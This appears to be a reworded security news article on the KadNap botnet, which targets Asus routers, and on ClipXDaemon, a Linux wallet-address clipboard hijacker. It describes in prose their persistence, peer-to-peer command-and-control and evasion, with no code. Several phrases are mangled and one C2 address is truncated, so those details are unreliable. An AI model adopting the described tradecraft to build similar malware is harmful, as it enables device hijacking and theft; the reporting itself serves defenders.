Cybersecurity researchers have discovered a new malware called KadNap that primarily targets Asus routers and forces them to join a botnet that proxies malicious traffic.
According to Lumen’s Black Lotus Labs team, the malware was first detected in August 2025 and has spread to more than 14,000 infected devices, with more than 60% of victims concentrated in the United States. Fewer infections have been detected in Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy and Spain.
“KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to hide the IP addresses of its infrastructure within peer-to-peer systems and evade traditional network monitoring,” the cybersecurity firm said in a report shared with Hacker News.
Compromised nodes in the network leverage the DHT protocol to locate and connect to command and control (C2) servers, making them more resistant to detection and disruption.
Once a device is compromised, it is sold by a proxy service named Doppelgänger (“Doppelgänger”[.]This is believed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelganger’s website claims to offer resident proxies that offer “100% anonymity” in over 50 countries. The service is said to launch in May or June 2025.
Despite its focus on Asus routers, KadNap operators have been found deploying malware against a variety of edge networking devices.
At the heart of the attack is a shell script (‘aic.sh’) downloaded from a C2 server (‘212.104.141’).[.]This file is responsible for starting the process of recruiting the victim into the P2P network. This file creates a cron job that retrieves a shell script from the server every hour at 55 minutes, renames it “.asusrouter” and runs it.
Once persistence is established, the script retrieves the malicious ELF file, renames it to “kad” and executes it. This in turn leads to the rollout of KadNap. This malware can target devices running both ARM and MIPS processors.
KadNap is designed to connect to a Network Time Protocol (NTP) server to obtain the current time and store it along with host uptime. This information serves as the basis for creating hashes that are used to find other peers in the distributed network to receive commands or download additional files.
The files – fwr.sh and /tmp/.sose – contain functionality that closes port 22, the standard TCP port for Secure Shell (SSH) on infected devices, and extracts a list of C2 IP address and port combinations to connect to.
“In short, the innovative use of the DHT protocol allows malware to hide behind the noise of legitimate peer-to-peer traffic and establish a robust communication channel that is difficult to disrupt,” Lumen said.
Further analysis reveals that not all compromised devices are communicating with all C2 servers, indicating that the infrastructure is categorized based on device type and model.
The Black Lotus Labs team told The Hacker News that the Doppelgänger bot is being exploited by wild threat actors. “One problem is that these Asus (and other devices) can also be infected with other malware at the same time, making it difficult to say exactly who is responsible for specific malicious activity,” the company said.
We recommend that users running SOHO routers keep their devices up to date, reboot regularly, change default passwords, secure management interfaces, and replace end-of-life and end-of-life models.
“The KadNap botnet stands out among botnets that support anonymous proxies in their use of peer-to-peer networks for decentralized control,” Lumen concluded. “Their intent is clear: to avoid detection and make it difficult for defenders to defend.”
New Linux threat ClipXDaemon emerges
The disclosure comes as Cyble details a new Linux threat called ClipXDaemon that is designed to target cryptocurrency users by intercepting and changing the addresses of copied wallets. The Clipper malware is distributed via a Linux post-exploitation framework called ShadowHS and is described as an autonomous cryptocurrency clipboard hijacker that targets Linux X11 environments.
The malware is staged entirely in memory and employs stealth techniques such as process masquerading and Wayland session avoidance, while monitoring the clipboard every 200 milliseconds and replacing cryptocurrency addresses with attacker-controlled wallets. You can target Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets.
The decision to avoid running in a Wayland session is intentional, and the display server protocol’s security architecture puts additional controls in place, such as requiring explicit user interaction before an application can access clipboard content. By disabling the malware itself in such scenarios, it aims to eliminate noise and avoid runtime errors.
“ClipXDaemon is fundamentally different from traditional Linux malware. ClipXDaemon contains no command-and-control (C2) logic, executes no beacons, and does not require remote tasks,” the company said. “Instead, it monetizes victims directly by hijacking copied cryptocurrency wallet addresses in X11 sessions and replacing them with attacker-controlled addresses in real time.”
Source link
